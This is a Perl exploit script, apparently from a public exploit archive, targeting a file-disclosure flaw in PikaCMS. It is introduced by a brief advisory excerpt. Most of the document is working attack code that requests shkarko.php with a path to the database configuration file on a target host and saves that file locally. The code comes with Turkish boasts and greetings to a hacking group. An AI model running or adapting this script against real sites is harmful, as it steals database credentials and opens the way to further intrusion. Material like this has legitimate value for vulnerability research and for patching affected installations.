50 lines
No EOL
2 KiB
Perl
Executable file
50 lines
No EOL
2 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/48068/info
|
|
|
|
PikaCMS is prone to multiple local file-disclosure vulnerabilities because it fails to adequately validate user-supplied input.
|
|
|
|
Exploiting these vulnerabilities may allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
|
|
|
|
use LWP::Simple;
|
|
use LWP::UserAgent;
|
|
system('cls');
|
|
system('title Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit');
|
|
system('color 2');
|
|
if(@ARGV < 2)
|
|
{
|
|
print "[-]Su Sekilde Kocum. \n\n";
|
|
&help; exit();
|
|
}
|
|
sub help()
|
|
{
|
|
print "[+] usage1 : perl $0 HedefWeb /path/ \n";
|
|
print "[+] usage2 : perl $0 localhost / \n";
|
|
}
|
|
print "\n************************************************************************\n";
|
|
print "\* Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit *\n";
|
|
print "\* Exploited By : KnocKout *\n";
|
|
print "\* Contact : knockoutr[at]msn[dot]com *\n";
|
|
print "\* -- *\n";
|
|
print "\*********************************************************************\n\n\n";
|
|
($TargetIP, $path, $File,) = @ARGV;
|
|
$File="shkarko.php?f=lidhjet/baza_mysql.php";
|
|
my $url = "http://" . $TargetIP . $path . $File;
|
|
print "\n Az Bekle Sikertiyorum!!! \n\n";
|
|
my $useragent = LWP::UserAgent->new();
|
|
my $request = $useragent->get($url,":content_file" => "baza_mysql.php");
|
|
if ($request->is_success)
|
|
{
|
|
print "[+] $url <= Hedef Site Exploit Edildi!\n\n";
|
|
print "[+] OPERASYON TAMAM !\n";
|
|
print "[+] baza_mysql.php Dosyasi Indirildi (z_WALKING_TIMES_DATA.php)\n";
|
|
print "[+] GRAYHATZ STAR \n";
|
|
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
|
|
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
|
|
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
|
|
\n";
|
|
exit();
|
|
}
|
|
else
|
|
{
|
|
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
|
|
exit();
|
|
} |